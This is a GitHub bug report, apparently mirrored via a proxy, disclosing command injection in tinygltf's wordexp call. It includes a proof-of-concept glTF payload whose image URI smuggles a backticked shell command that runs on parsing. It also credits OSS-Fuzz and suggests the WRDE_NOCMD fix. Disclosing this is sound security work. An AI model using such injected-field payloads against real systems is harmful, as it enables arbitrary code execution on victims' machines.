这是indexloc提供的服务,不要输入任何密码
Skip to content

Command injection via wordexp call.  #368

@oliverchang

Description

@oliverchang

Describe the issue

This is a security vulnerability. The wordexp call here allows arbitrary code execution

int ret = wordexp(quoted_path.c_str(), &p, 0);
when parsing a gltf file.

To Reproduce

  • OS: Linux
  • Compiler, compiler version, compile options: Clang 13.0.1-6
$ git clone https://github.com/syoyo/tinygltf
$ cd tinygltf && make all
$ echo '{"images":[{"uri":"a`echo iamhere > poc`"}], "asset":{"version":""}}' > payload.gltf
$ ./loader_example payload.gltf
$ cat poc
iamhere

Expected behaviour
The echo iamhere > poc command should not be executed and the poc file is not created in the CWD.

Additional context
This was found by OSS-Fuzz: https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=49053

One potential fix here is to pass WRDE_NOCMD to wordexp per https://man7.org/linux/man-pages/man3/wordexp.3.html

Metadata

Metadata

Assignees

No one assigned

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions